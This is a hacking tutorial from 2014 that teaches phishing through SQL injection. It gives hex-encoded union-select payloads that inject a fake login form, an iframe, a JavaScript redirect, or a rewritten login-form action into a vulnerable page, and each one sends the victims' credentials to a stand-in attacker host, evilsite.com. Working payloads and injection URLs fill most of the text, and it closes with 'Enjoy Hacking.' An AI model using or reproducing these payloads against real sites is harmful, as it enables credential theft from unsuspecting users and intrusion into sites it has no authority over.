Welcome to my yet another tutorial related to SQLi, this time as the title say it all we are going to do phishing with URL spoofing using SQL injection vulnerabilty. For those who have not read the basics of SQL injection i suggest you to go and read N00bz guide to SQL injection.

If you are new to phishing i let me explain, phishing is a attack where an attacker fool the user to enter his secret credentials which are sent to him using any specially crafted page or application etc.

The Concept:

We are going to inject our payload into the SQL injection and add some extra code to the webpage just as we did in XSS. If you have not read XSS with SQL Injection Tutorial then read that for a better understanding.

Approaches we can use to Achieve it.

1. Finding the Vulnrability.
2. Preparing the Injectable Query.
3. Inject HTML Coded form into Website (For n00bz like me)
4. Injection Iframe into the Website
5. Redirect user to Your Fake Page (URL will be changed)
6. Inject a javascript to change Current Login Form (For l33ts like my Freind d3c0mp!l3R)

Finding the Vulnerability, Preparing the Injectable query all goes in the Basic SQL injection. Read them before you continue.

I suppose you have read them all.

So lets continue

3. Inject HTML Coded form into Website

I assume you read the above tutorials so we can for example take a website and lets say the 3rd column gets printed on the webpage as output. So we will inject our payload into it. To make things simple we will encode our payload into hex.

Our Payload
<form action=http://evilsite.com/get_it.php method="POST">
Username : <input type="text" name="username"><br>
Password :<input type="text" name="password">
<input type="submit">
</form>
<iframe height=0 width=0>

Hex Encoded value:
0x3c666f726d20616374696f6e3d687474703a2f2f6576696c736974652e636f6d2f6765745f69742e706870206d6574686f643d22504f5354223e557365726e616d65203a203c696e70757420747970653d227465787422206e616d653d22757365726e616d65223e3c62723e50617373776f7264203a3c696e70757420747970653d227465787422206e616d653d2270617373776f7264223e3c696e70757420747970653d227375626d6974223e3c2f666f726d3e3c696672616d65206865696768743d302077696474683d303e


Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c666f726d20616374696f6e3d687474703a2f2f6576696c736974652e636f6d2f6765745f69742e706870206d6574686f643d22504f5354223e557365726e616d65203a203c696e70757420747970653d227465787422206e616d653d22757365726e616d65223e3c62723e50617373776f7264203a3c696e70757420747970653d227465787422206e616d653d2270617373776f7264223e3c696e70757420747970653d227375626d6974223e3c2f666f726d3e3c696672616d65206865696768743d302077696474683d303e,4--

The above url will output the our payload into the Website. And the user will see a form into the website, in which if he login the credentials will be sent to the Attacker.

4. Injection Iframe into the Website

This time we will inject an iframe in the website which makes the payload small and we can make the login look much better in this way.

Our Payload
<br><iframe src="http://www.evilsite.com/fakepage.php" height=300 width=300 frameBorder="0" scrolling="no"></iframe>

Hex Encoded value
0x3c62723e3c696672616d65207372633d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e70687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e


Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c62723e3c696672616d65207372633d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e70687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e,4--

The above url will output the our payload into the Website. And the user will see a form into the website, in which if he login the credentials will be sent to the Attacker.

5. Redirect user to Your Fake Page

This time we will inject javascript in the website which will redirect the user to our fakepage.

Our Payload
<script>window.location.href="http://www.evilsite.com/fakepage.php"</script>
Hex Encoded value
0x3c7363726970743e77696e646f772e6c6f636174696f6e2e687265663d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e

Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c7363726970743e77696e646f772e6c6f636174696f6e2e687265663d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e,4--

The above url will inject the javascript into the page which will redirect user to our fakepage, in which if he login the credentials will be sent to the Attacker. The drawback it have is the URL spoofing part. Which we will cover in the next attack.

6. Inject a javascript to change Current Login Form

In this attack we will inject javascript in the website which will change the action of current login page in the site to our fake login page link.

Our Payload
<script>document.getElementsByTagName("form")[0].action="http://www.evilsite.com/fakepage.php"</script>
Hex Encoded value
0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e

Injecting our payload:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e6576696c736974652e636f6d2f66616b65706167652e706870223c2f7363726970743e,4--

The above url will inject the javascript into the page which will send the users credentials logged into real page to our fakepage.

Enjoy Hacking.

Author : Zenodermus Javanicus
Date : 2014-04-06